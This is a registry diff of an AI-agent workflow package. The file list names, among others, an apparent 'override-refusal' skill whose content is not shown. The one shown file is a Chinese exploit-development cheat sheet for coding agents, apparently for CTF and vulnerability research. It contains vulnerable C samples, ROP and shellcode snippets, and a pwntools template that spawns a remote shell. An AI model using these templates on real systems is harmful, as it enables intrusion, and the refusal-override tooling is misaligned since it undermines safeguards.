ccg-ros2-workflow 2.2.2 → 3.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (186) hide show
  1. package/README.md +211 -96
  2. package/README.zh-CN.md +256 -0
  3. package/dist/cli.mjs +15 -15
  4. package/dist/index.d.mts +59 -36
  5. package/dist/index.d.ts +59 -36
  6. package/dist/index.mjs +4 -4
  7. package/dist/shared/ccg-ros2-workflow.Bhm8c7P1.mjs +5154 -0
  8. package/package.json +31 -12
  9. package/templates/codex/AGENTS.md +348 -0
  10. package/templates/codex/agents/ccg-implement.toml +73 -0
  11. package/templates/codex/agents/ccg-research.toml +73 -0
  12. package/templates/codex/agents/ccg-review.toml +82 -0
  13. package/templates/codex/config.toml +21 -0
  14. package/templates/codex/hooks/ccg-workflow.py +253 -0
  15. package/templates/codex/hooks.json +15 -0
  16. package/templates/commands/agents/planner.md +97 -122
  17. package/templates/commands/agents/system-integrator.md +2 -2
  18. package/templates/commands/agents/team-architect.md +97 -0
  19. package/templates/commands/agents/team-qa.md +121 -0
  20. package/templates/commands/agents/team-reviewer.md +112 -0
  21. package/templates/commands/commit.md +30 -1
  22. package/templates/commands/context.md +332 -0
  23. package/templates/commands/go.md +206 -0
  24. package/templates/commands/init.md +1 -1
  25. package/templates/commands/spec-impl.md +41 -21
  26. package/templates/commands/spec-init.md +21 -27
  27. package/templates/commands/spec-plan.md +54 -21
  28. package/templates/commands/spec-research.md +78 -26
  29. package/templates/commands/spec-review.md +20 -16
  30. package/templates/{commands → commands-legacy}/analyze.md +1 -1
  31. package/templates/commands-legacy/backend.md +224 -0
  32. package/templates/commands-legacy/codex-exec.md +411 -0
  33. package/templates/{commands → commands-legacy}/debug.md +1 -1
  34. package/templates/commands-legacy/enhance.md +55 -0
  35. package/templates/{commands → commands-legacy}/feat.md +2 -2
  36. package/templates/commands-legacy/frontend.md +213 -0
  37. package/templates/{commands → commands-legacy}/optimize.md +1 -1
  38. package/templates/{commands → commands-legacy}/plan.md +1 -15
  39. package/templates/{commands → commands-legacy}/team-plan.md +1 -1
  40. package/templates/commands-legacy/team.md +475 -0
  41. package/templates/{commands → commands-legacy}/test.md +1 -1
  42. package/templates/commands-legacy/workflow.md +283 -0
  43. package/templates/engine/model-router.md +123 -0
  44. package/templates/engine/phase-guide.md +207 -0
  45. package/templates/engine/strategies/debug-investigate.md +169 -0
  46. package/templates/engine/strategies/deep-research.md +141 -0
  47. package/templates/engine/strategies/direct-fix.md +108 -0
  48. package/templates/engine/strategies/full-collaborate.md +389 -0
  49. package/templates/engine/strategies/git-action.md +43 -0
  50. package/templates/engine/strategies/guided-develop.md +282 -0
  51. package/templates/engine/strategies/optimize-measure.md +103 -0
  52. package/templates/engine/strategies/quick-implement.md +96 -0
  53. package/templates/engine/strategies/refactor-safely.md +180 -0
  54. package/templates/engine/strategies/review-audit.md +123 -0
  55. package/templates/hooks/session-start.js +100 -0
  56. package/templates/hooks/skill-router.js +144 -0
  57. package/templates/hooks/subagent-context.js +161 -0
  58. package/templates/hooks/task-utils.js +190 -0
  59. package/templates/hooks/workflow-state.js +55 -0
  60. package/templates/output-styles/abyss-command.md +56 -0
  61. package/templates/output-styles/abyss-concise.md +89 -0
  62. package/templates/output-styles/abyss-ritual.md +70 -0
  63. package/templates/output-styles/engineer-professional.md +20 -3
  64. package/templates/output-styles/laowang-engineer.md +2 -2
  65. package/templates/prompts/antigravity/analyzer.md +59 -0
  66. package/templates/prompts/antigravity/architect.md +55 -0
  67. package/templates/prompts/antigravity/builder.md +52 -0
  68. package/templates/prompts/antigravity/debugger.md +48 -0
  69. package/templates/prompts/antigravity/frontend.md +50 -0
  70. package/templates/prompts/antigravity/optimizer.md +40 -0
  71. package/templates/prompts/antigravity/reviewer.md +67 -0
  72. package/templates/prompts/antigravity/tester.md +39 -0
  73. package/templates/prompts/claude/debugger.md +1 -1
  74. package/templates/prompts/claude/reviewer.md +1 -1
  75. package/templates/prompts/codex/analyzer.md +8 -0
  76. package/templates/prompts/codex/architect.md +9 -1
  77. package/templates/prompts/codex/builder.md +61 -0
  78. package/templates/prompts/codex/debugger.md +9 -1
  79. package/templates/prompts/codex/optimizer.md +7 -0
  80. package/templates/prompts/codex/reviewer.md +7 -0
  81. package/templates/prompts/codex/tester.md +8 -1
  82. package/templates/prompts/gemini/analyzer.md +11 -3
  83. package/templates/prompts/gemini/architect.md +10 -2
  84. package/templates/prompts/gemini/debugger.md +8 -0
  85. package/templates/prompts/gemini/frontend.md +10 -2
  86. package/templates/prompts/gemini/optimizer.md +9 -2
  87. package/templates/prompts/gemini/reviewer.md +7 -0
  88. package/templates/prompts/gemini/tester.md +8 -1
  89. package/templates/rules/ccg-skill-routing.md +91 -0
  90. package/templates/rules/ccg-skills.md +65 -0
  91. package/templates/skills/SKILL.md +92 -0
  92. package/templates/skills/domains/ai/SKILL.md +34 -0
  93. package/templates/skills/domains/ai/agent-dev.md +242 -0
  94. package/templates/skills/domains/ai/llm-security.md +288 -0
  95. package/templates/skills/domains/ai/prompt-and-eval.md +279 -0
  96. package/templates/skills/domains/ai/rag-system.md +542 -0
  97. package/templates/skills/domains/architecture/SKILL.md +42 -0
  98. package/templates/skills/domains/architecture/api-design.md +225 -0
  99. package/templates/skills/domains/architecture/caching.md +299 -0
  100. package/templates/skills/domains/architecture/cloud-native.md +285 -0
  101. package/templates/skills/domains/architecture/message-queue.md +329 -0
  102. package/templates/skills/domains/architecture/security-arch.md +297 -0
  103. package/templates/skills/domains/data-engineering/SKILL.md +207 -0
  104. package/templates/skills/domains/development/SKILL.md +46 -0
  105. package/templates/skills/domains/development/cpp.md +369 -0
  106. package/templates/skills/domains/development/go.md +323 -0
  107. package/templates/skills/domains/development/java.md +277 -0
  108. package/templates/skills/domains/development/python.md +487 -0
  109. package/templates/skills/domains/development/rust.md +313 -0
  110. package/templates/skills/domains/development/shell.md +313 -0
  111. package/templates/skills/domains/development/typescript.md +277 -0
  112. package/templates/skills/domains/devops/SKILL.md +39 -0
  113. package/templates/skills/domains/devops/cost-optimization.md +272 -0
  114. package/templates/skills/domains/devops/database.md +217 -0
  115. package/templates/skills/domains/devops/devsecops.md +198 -0
  116. package/templates/skills/domains/devops/git-workflow.md +181 -0
  117. package/templates/skills/domains/devops/observability.md +280 -0
  118. package/templates/skills/domains/devops/performance.md +336 -0
  119. package/templates/skills/domains/devops/testing.md +283 -0
  120. package/templates/skills/domains/infrastructure/SKILL.md +200 -0
  121. package/templates/skills/domains/mobile/SKILL.md +224 -0
  122. package/templates/skills/domains/orchestration/SKILL.md +29 -0
  123. package/templates/skills/domains/orchestration/multi-agent.md +263 -0
  124. package/templates/skills/domains/ros2-control/SKILL.md +206 -0
  125. package/templates/skills/domains/ros2-hardware/SKILL.md +277 -0
  126. package/templates/skills/domains/ros2-manipulation/SKILL.md +237 -0
  127. package/templates/skills/domains/ros2-navigation/SKILL.md +196 -0
  128. package/templates/skills/domains/ros2-perception/SKILL.md +166 -0
  129. package/templates/skills/domains/ros2-upper-app/SKILL.md +50 -0
  130. package/templates/skills/domains/ros2-upper-app/launch-files.md +224 -0
  131. package/templates/skills/domains/ros2-upper-app/parameters.md +192 -0
  132. package/templates/skills/domains/ros2-upper-app/python-nodes.md +249 -0
  133. package/templates/skills/domains/ros2-upper-app/rviz-config.md +158 -0
  134. package/templates/skills/domains/ros2-upper-app/simulation.md +225 -0
  135. package/templates/skills/domains/security/SKILL.md +72 -0
  136. package/templates/skills/domains/security/blue-team.md +436 -0
  137. package/templates/skills/domains/security/code-audit.md +265 -0
  138. package/templates/skills/domains/security/pentest.md +226 -0
  139. package/templates/skills/domains/security/red-team.md +374 -0
  140. package/templates/skills/domains/security/threat-intel.md +372 -0
  141. package/templates/skills/domains/security/vuln-research.md +369 -0
  142. package/templates/skills/orchestration/multi-agent/SKILL.md +533 -0
  143. package/templates/skills/run_skill.js +129 -0
  144. package/templates/skills/scrapling/SKILL.md +98 -0
  145. package/templates/skills/scrapling/references/api-quick-ref.md +127 -0
  146. package/templates/skills/scrapling/references/cookie-vault.md +56 -0
  147. package/templates/skills/scrapling/references/maintenance.md +79 -0
  148. package/templates/skills/scrapling/references/site-patterns.md +86 -0
  149. package/templates/skills/scrapling/references/troubleshooting.md +95 -0
  150. package/templates/skills/scrapling/templates/basic_fetch.py +19 -0
  151. package/templates/skills/scrapling/templates/parse_only.py +15 -0
  152. package/templates/skills/scrapling/templates/session_login.py +19 -0
  153. package/templates/skills/scrapling/templates/stealth_cloudflare.py +28 -0
  154. package/templates/skills/tools/gen-docs/SKILL.md +116 -0
  155. package/templates/skills/tools/gen-docs/scripts/doc_generator.js +435 -0
  156. package/templates/skills/tools/lib/shared.js +98 -0
  157. package/templates/skills/tools/override-refusal/SKILL.md +53 -0
  158. package/templates/skills/tools/override-refusal/agents/openai.yaml +4 -0
  159. package/templates/skills/tools/override-refusal/scripts/refusal_rewriter.js +226 -0
  160. package/templates/skills/tools/verify-change/SKILL.md +140 -0
  161. package/templates/skills/tools/verify-change/scripts/change_analyzer.js +289 -0
  162. package/templates/skills/tools/verify-module/SKILL.md +127 -0
  163. package/templates/skills/tools/verify-module/scripts/module_scanner.js +171 -0
  164. package/templates/skills/tools/verify-quality/SKILL.md +160 -0
  165. package/templates/skills/tools/verify-quality/scripts/quality_checker.js +337 -0
  166. package/templates/skills/tools/verify-security/SKILL.md +143 -0
  167. package/templates/skills/tools/verify-security/scripts/security_scanner.js +283 -0
  168. package/templates/spec/guides/index.md +30 -0
  169. package/templates/spec/low-control/index.md +31 -0
  170. package/templates/spec/upper-app/index.md +31 -0
  171. package/bin/codeagent-wrapper-darwin-amd64 +0 -0
  172. package/bin/codeagent-wrapper-darwin-arm64 +0 -0
  173. package/bin/codeagent-wrapper-linux-amd64 +0 -0
  174. package/bin/codeagent-wrapper-linux-arm64 +0 -0
  175. package/bin/codeagent-wrapper-windows-amd64.exe +0 -0
  176. package/bin/codeagent-wrapper-windows-arm64.exe +0 -0
  177. package/dist/shared/ccg-ros2-workflow.DnOr3oPi.mjs +0 -2480
  178. package/templates/commands/backend.md +0 -162
  179. package/templates/commands/enhance.md +0 -36
  180. package/templates/commands/frontend.md +0 -162
  181. package/templates/commands/workflow.md +0 -202
  182. /package/templates/{commands → commands-legacy}/execute.md +0 -0
  183. /package/templates/{commands → commands-legacy}/review.md +0 -0
  184. /package/templates/{commands → commands-legacy}/team-exec.md +0 -0
  185. /package/templates/{commands → commands-legacy}/team-research.md +0 -0
  186. /package/templates/{commands → commands-legacy}/team-review.md +0 -0
package/templates/skills/domains/security/vuln-research.md ADDED
@@ -0,0 +1,369 @@
1
+ ---
2
+ name: vuln-research
3
+ description: 漏洞研究。二进制分析、逆向工程、Exploit开发、Fuzzing。当用户提到漏洞研究、二进制、逆向、Exploit、Fuzzing、PWN、栈溢出、堆溢出时使用。
4
+ ---
5
+
6
+ # 🔥 赤焰秘典 · 漏洞研究 (Vulnerability Research)
7
+
8
+
9
+ ## 研究流程
10
+
11
+ ```
12
+ 目标分析 → 逆向工程 → 漏洞发现 → Exploit开发 → 报告/披露
13
+ │ │ │ │ │
14
+ └─ 架构 ────┴─ IDA ─────┴─ Fuzz ────┴─ PoC ────┴─ CVE
15
+ ```
16
+
17
+ ## 逆向工程
18
+
19
+ ### 静态分析
20
+ ```bash
21
+ # 文件信息
22
+ file binary
23
+ strings binary | grep -i password
24
+ readelf -h binary
25
+ objdump -d binary
26
+
27
+ # IDA Pro / Ghidra
28
+ # 反汇编、反编译、交叉引用分析
29
+ ```
30
+
31
+ ### 动态分析
32
+ ```bash
33
+ # GDB 调试
34
+ gdb ./binary
35
+ (gdb) break main
36
+ (gdb) run
37
+ (gdb) disas
38
+ (gdb) x/20x $esp
39
+ (gdb) info registers
40
+
41
+ # strace/ltrace
42
+ strace ./binary
43
+ ltrace ./binary
44
+
45
+ # GDB 增强
46
+ # pwndbg / GEF / peda
47
+ ```
48
+
49
+ ### 常用工具
50
+ ```yaml
51
+ 反汇编/反编译:
52
+ - IDA Pro: 商业,最强大
53
+ - Ghidra: 开源,NSA出品
54
+ - Binary Ninja: 现代化
55
+ - Radare2: 开源命令行
56
+
57
+ 调试器:
58
+ - GDB + pwndbg/GEF
59
+ - x64dbg (Windows)
60
+ - WinDbg (Windows内核)
61
+ - LLDB (macOS)
62
+
63
+ 辅助工具:
64
+ - ROPgadget: ROP链构造
65
+ - one_gadget: libc gadget
66
+ - patchelf: ELF修改
67
+ - checksec: 安全机制检查
68
+ ```
69
+
70
+ ## 漏洞类型
71
+
72
+ ### 栈溢出
73
+ ```c
74
+ // 漏洞代码
75
+ void vulnerable(char *input) {
76
+ char buffer[64];
77
+ strcpy(buffer, input); // 无边界检查
78
+ }
79
+
80
+ // 利用思路
81
+ // 1. 覆盖返回地址
82
+ // 2. 跳转到 shellcode 或 ROP 链
83
+ ```
84
+
85
+ ```python
86
+ # Exploit 模板
87
+ from pwn import *
88
+
89
+ context.arch = 'amd64'
90
+ p = process('./vuln')
91
+
92
+ # 构造 payload
93
+ padding = b'A' * 72 # 填充到返回地址
94
+ ret_addr = p64(0x401234) # 目标地址
95
+
96
+ payload = padding + ret_addr
97
+ p.sendline(payload)
98
+ p.interactive()
99
+ ```
100
+
101
+ ### 堆溢出
102
+ ```c
103
+ // 漏洞代码
104
+ struct chunk {
105
+ char data[32];
106
+ void (*func_ptr)();
107
+ };
108
+
109
+ void vulnerable(char *input) {
110
+ struct chunk *c = malloc(sizeof(struct chunk));
111
+ strcpy(c->data, input); // 溢出覆盖 func_ptr
112
+ c->func_ptr();
113
+ }
114
+ ```
115
+
116
+ ### Use-After-Free
117
+ ```c
118
+ // 漏洞代码
119
+ void vulnerable() {
120
+ char *ptr = malloc(64);
121
+ free(ptr);
122
+ // ptr 未置空
123
+ strcpy(ptr, user_input); // UAF
124
+ }
125
+ ```
126
+
127
+ ### 格式化字符串
128
+ ```c
129
+ // 漏洞代码
130
+ void vulnerable(char *input) {
131
+ printf(input); // 格式化字符串漏洞
132
+ }
133
+
134
+ // 利用
135
+ // %x - 泄露栈数据
136
+ // %n - 任意写
137
+ // %s - 任意读
138
+ ```
139
+
140
+ ## 保护机制绕过
141
+
142
+ ### 检查保护
143
+ ```bash
144
+ checksec ./binary
145
+ # RELRO, Stack Canary, NX, PIE, FORTIFY
146
+ ```
147
+
148
+ ### 绕过技术
149
+ ```yaml
150
+ NX (不可执行):
151
+ - ROP (Return Oriented Programming)
152
+ - ret2libc
153
+ - ret2syscall
154
+
155
+ ASLR (地址随机化):
156
+ - 信息泄露
157
+ - 暴力破解 (32位)
158
+ - 部分覆盖
159
+
160
+ Stack Canary:
161
+ - 信息泄露
162
+ - 逐字节爆破
163
+ - 覆盖 __stack_chk_fail
164
+
165
+ PIE (位置无关):
166
+ - 信息泄露基址
167
+ - 部分覆盖
168
+
169
+ RELRO:
170
+ - Partial: 覆盖 GOT
171
+ - Full: 其他利用方式
172
+ ```
173
+
174
+ ### ROP 链构造
175
+ ```python
176
+ from pwn import *
177
+
178
+ elf = ELF('./vuln')
179
+ libc = ELF('./libc.so.6')
180
+ rop = ROP(elf)
181
+
182
+ # 泄露 libc 地址
183
+ rop.puts(elf.got['puts'])
184
+ rop.main()
185
+
186
+ # 计算 libc 基址
187
+ libc_base = leaked_puts - libc.symbols['puts']
188
+ system = libc_base + libc.symbols['system']
189
+ bin_sh = libc_base + next(libc.search(b'/bin/sh'))
190
+
191
+ # 第二阶段 ROP
192
+ rop2 = ROP(libc)
193
+ rop2.system(bin_sh)
194
+ ```
195
+
196
+ ## Fuzzing
197
+
198
+ ### AFL++
199
+ ```bash
200
+ # 编译插桩
201
+ afl-gcc -o target_afl target.c
202
+
203
+ # 准备种子
204
+ mkdir input output
205
+ echo "seed" > input/seed
206
+
207
+ # 开始 Fuzz
208
+ afl-fuzz -i input -o output -- ./target_afl @@
209
+
210
+ # 分析崩溃
211
+ afl-tmin -i output/crashes/id:000000 -o minimized -- ./target_afl @@
212
+ ```
213
+
214
+ ### LibFuzzer
215
+ ```cpp
216
+ // fuzz_target.cpp
217
+ extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
218
+ // 调用被测函数
219
+ parse_input(data, size);
220
+ return 0;
221
+ }
222
+ ```
223
+
224
+ ```bash
225
+ # 编译
226
+ clang++ -fsanitize=fuzzer,address fuzz_target.cpp -o fuzzer
227
+
228
+ # 运行
229
+ ./fuzzer corpus/
230
+ ```
231
+
232
+ ### 智能 Fuzzing
233
+ ```python
234
+ # 基于覆盖率的 Fuzzing
235
+ # 使用 AFL、LibFuzzer 等
236
+
237
+ # 基于语法的 Fuzzing
238
+ # 使用 Peach、Domato 等
239
+
240
+ # 符号执行辅助
241
+ # 使用 KLEE、angr 等
242
+ ```
243
+
244
+ ## Exploit 开发
245
+
246
+ ### Shellcode
247
+ ```python
248
+ # pwntools 生成
249
+ from pwn import *
250
+ context.arch = 'amd64'
251
+
252
+ # execve("/bin/sh", NULL, NULL)
253
+ shellcode = asm(shellcraft.sh())
254
+
255
+ # 自定义 shellcode
256
+ shellcode = asm('''
257
+ xor rdi, rdi
258
+ push rdi
259
+ mov rdi, 0x68732f6e69622f
260
+ push rdi
261
+ mov rdi, rsp
262
+ xor rsi, rsi
263
+ xor rdx, rdx
264
+ mov al, 59
265
+ syscall
266
+ ''')
267
+ ```
268
+
269
+ ### 完整 Exploit 模板
270
+ ```python
271
+ #!/usr/bin/env python3
272
+ from pwn import *
273
+
274
+ context.arch = 'amd64'
275
+ context.log_level = 'debug'
276
+
277
+ # 配置
278
+ binary = './vuln'
279
+ libc_path = './libc.so.6'
280
+ host, port = 'target.com', 1337
281
+
282
+ # 加载
283
+ elf = ELF(binary)
284
+ libc = ELF(libc_path)
285
+
286
+ def exploit(p):
287
+ # 1. 泄露地址
288
+ payload1 = b'A' * 72
289
+ payload1 += p64(elf.plt['puts'])
290
+ payload1 += p64(elf.got['puts'])
291
+ payload1 += p64(elf.symbols['main'])
292
+
293
+ p.sendline(payload1)
294
+ leaked = u64(p.recvline().strip().ljust(8, b'\x00'))
295
+ libc_base = leaked - libc.symbols['puts']
296
+ log.success(f"libc base: {hex(libc_base)}")
297
+
298
+ # 2. 获取 shell
299
+ system = libc_base + libc.symbols['system']
300
+ bin_sh = libc_base + next(libc.search(b'/bin/sh'))
301
+
302
+ payload2 = b'A' * 72
303
+ payload2 += p64(libc_base + 0x4f3d5) # one_gadget
304
+
305
+ p.sendline(payload2)
306
+ p.interactive()
307
+
308
+ if __name__ == '__main__':
309
+ if args.REMOTE:
310
+ p = remote(host, port)
311
+ else:
312
+ p = process(binary)
313
+ exploit(p)
314
+ ```
315
+
316
+ ## CTF PWN 技巧
317
+
318
+ ### 常见题型
319
+ ```yaml
320
+ 栈溢出:
321
+ - ret2text: 跳转到后门函数
322
+ - ret2shellcode: 跳转到 shellcode
323
+ - ret2libc: 调用 system("/bin/sh")
324
+ - ROP: 构造 ROP 链
325
+
326
+ 堆利用:
327
+ - fastbin attack
328
+ - unsorted bin attack
329
+ - tcache poisoning
330
+ - house of 系列
331
+
332
+ 格式化字符串:
333
+ - 泄露栈/libc地址
334
+ - 任意写 GOT
335
+ - 修改返回地址
336
+ ```
337
+
338
+ ### 快速解题流程
339
+ ```bash
340
+ # 1. 检查保护
341
+ checksec ./pwn
342
+
343
+ # 2. 运行测试
344
+ ./pwn
345
+
346
+ # 3. 反编译分析
347
+ # IDA/Ghidra
348
+
349
+ # 4. 确定漏洞点
350
+ # 5. 编写 Exploit
351
+ # 6. 本地测试
352
+ # 7. 远程利用
353
+ ```
354
+
355
+ ## 工具清单
356
+
357
+ | 工具 | 用途 |
358
+ |------|------|
359
+ | IDA Pro | 反汇编/反编译 |
360
+ | Ghidra | 开源逆向 |
361
+ | pwntools | Exploit 开发 |
362
+ | GDB + pwndbg | 调试 |
363
+ | AFL++ | Fuzzing |
364
+ | ROPgadget | ROP 链 |
365
+ | one_gadget | libc gadget |
366
+ | angr | 符号执行 |
367
+
368
+ ---
369
+